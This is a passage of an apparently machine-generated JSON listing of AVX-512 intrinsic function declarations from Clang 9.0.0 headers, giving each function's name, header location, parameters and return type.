"name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_or_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:219:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_or_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:226:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_or_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:231:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_or_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:238:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_and_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:245:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_and_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:250:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_and_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:257:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_and_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:264:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_and_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:269:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_and_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:276:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_andnot_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:283:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_andnot_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:288:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_andnot_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:295:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_andnot_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:302:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_andnot_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:307:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_andnot_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:314:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_cvtpd_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:321:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_cvtpd_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:329:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_cvtpd_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:337:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_cvtpd_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:360:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_cvtpd_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:368:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_cvtpd_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:376:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_cvtps_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:399:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_cvtps_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:407:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_cvtps_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:415:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_cvtps_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:438:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_cvtps_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:446:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_cvtps_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:454:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_cvtepi64_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:478:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_cvtepi64_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:483:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_cvtepi64_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:490:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_cvtepi64_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:512:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm512_mask_cvtepi64_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:520:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm512_maskz_cvtepi64_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:528:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm512_cvttpd_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:552:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_cvttpd_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:560:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_cvttpd_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:568:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_cvttpd_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:591:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_cvttpd_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:599:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_cvttpd_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:607:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_cvttps_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:630:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_cvttps_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:638:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_cvttps_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:646:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_cvttps_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:669:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_cvttps_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:677:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_cvttps_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:685:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_cvtepu64_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:708:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_cvtepu64_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:713:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_cvtepu64_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:720:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_cvtepu64_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:744:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm512_mask_cvtepu64_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:752:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm512_maskz_cvtepu64_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:760:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm512_movepi32_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:1054:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__mmask16" } }, { "tag": "function", "name": "_mm512_movm_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:1060:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask16" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_movm_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:1066:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_movepi64_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:1072:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm512_broadcast_f32x2", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:1079:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_broadcast_f32x2", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:1087:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_broadcast_f32x2", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:1095:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_broadcast_f32x8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:1103:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_broadcast_f32x8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:1111:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_broadcast_f32x8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:1119:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_broadcast_f64x2", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:1127:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_broadcast_f64x2", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:1134:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_broadcast_f64x2", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:1142:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_broadcast_i32x2", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:1150:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_broadcast_i32x2", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:1158:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_broadcast_i32x2", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:1166:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_broadcast_i32x8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:1174:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_broadcast_i32x8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:1182:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_broadcast_i32x8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:1190:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_broadcast_i64x2", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:1198:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_broadcast_i64x2", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:1205:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_broadcast_i64x2", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:1213:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm256_popcnt_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbitalgintrin.h:22:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_popcnt_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbitalgintrin.h:28:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_popcnt_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbitalgintrin.h:36:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" 